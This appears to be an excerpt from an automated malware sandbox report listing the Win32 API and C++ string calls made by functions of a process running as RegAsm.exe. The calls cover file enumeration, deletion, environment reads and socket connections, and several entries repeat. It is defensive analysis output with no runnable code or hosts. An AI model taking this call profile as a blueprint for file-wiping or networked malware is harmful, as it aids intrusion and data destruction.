            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_